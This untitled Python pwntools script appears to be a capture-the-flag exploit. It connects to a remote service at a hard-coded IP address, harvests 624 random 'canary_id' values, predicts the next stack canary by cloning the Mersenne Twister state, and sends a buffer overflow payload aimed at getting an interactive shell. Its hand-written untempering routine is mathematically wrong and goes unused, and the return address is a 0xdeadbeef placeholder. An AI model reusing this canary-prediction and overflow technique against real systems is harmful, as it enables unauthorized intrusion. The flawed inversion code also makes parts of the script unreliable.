Untitled

from pwn import *
import struct

import random
from mt19937predictor import MT19937Predictor

predictor = MT19937Predictor()

class MersenneTwisterPredictor:
    def __init__(self, observed_values):
        self.MT = [0] * 624
        self.index = 0
        self.predict(observed_values)

    def predict(self, observed_values):
        for i in range(624):
            self.MT[i] = self.un_temper(observed_values[i])
        self.index = 624

    def un_temper(self, y):
        # Reverse y ^= (y >> 18)
        y ^= (y >> 18)

        # Reverse y ^= (y << 15) & 0xefc60000
        y ^= (y << 15) & 0xefc60000

        # Reverse y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 7) & 0x9d2c5680

        # Reverse y ^= (y >> 11)
        y ^= (y >> 11)
        y ^= (y >> 11)
        
        return y

    def extract_number(self):
        if self.index >= 624:
            self.twist()
        
        y = self.MT[self.index]
        y ^= (y >> 11)
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 15) & 0xefc60000
        y ^= (y >> 18)

        self.index += 1
        return y & 0xffffffff

    def twist(self):
        for i in range(624):
            y = (self.MT[i] & 0x80000000) | (self.MT[(i + 1) % 624] & 0x7fffffff)
            self.MT[i] = self.MT[(i + 397) % 624] ^ (y >> 1)
            if y % 2 != 0:  # equivalent to checking the lowest bit
                self.MT[i] ^= 0x9908b0df
        self.index = 0

def collect_mt_outputs(conn):
    outputs = []
    conn.sendline(b'c')
    for _ in range(624):
        # Send 'c' to request canary_id
        conn.sendline('y')
        conn.recvuntil(b"canary_id: ")
        canary_id = int(conn.recvline().strip())
        print(canary_id)
        outputs.append(canary_id)
        #conn.sendline(b'y')
    return outputs

def exploit(conn, predicted_canary):
    print(predicted_canary)
    
    '''
    conn.sendline(b'c')  # Request one more canary
    conn.recvuntil(b"canary_id: ")
    actual_canary = int(conn.recvline().strip())
    print("actual canary: ", actual_canary)
    print("predicted canary: ", predicted_canary)
    print(f"Actual next canary: {actual_canary:08x}")
    print(f"Predicted canary:  {predicted_canary:08x}")
   

    if predicted_canary == actual_canary:
        print("Prediction successful!")
    else:
        print("Prediction failed.")
    '''

    # Craft payload
    buffer_size = 256  # Adjust this based on the actual buffer size
    payload = b"A" * buffer_size
    payload += struct.pack("<I", predicted_canary)  # Assuming 32-bit canary
    payload += b"B" * 12  # Padding to reach return address
    payload += p32(0xdeadbeef)  # Fake return address (replace with actual exploit)

    # Send payload
    conn.sendline(payload)
    # Try to get a shell
    conn.interactive()

def main():
    # Connect to the service
    conn = remote('3.81.92.37', 4242)

    # Collect MT outputs
    mt_outputs = collect_mt_outputs(conn)

    # Predict next canary
    #p = MersenneTwisterPredictor(mt_outputs)

        #with open('data.txt', 'r') as file:
    for n in mt_outputs:
        predictor.setrandbits(n, 32)    

    #print("calculator: ", predictor.getrandbits(32))


    #predicted_canary = p.extract_number()
    #print(f"Predicted canary: {predicted_canary:08x}")

    # Exploit using predicted canary
    predicted_canary = predictor.getrandbits(32)

    exploit(conn, predicted_canary)

if __name__ == "__main__":
    main()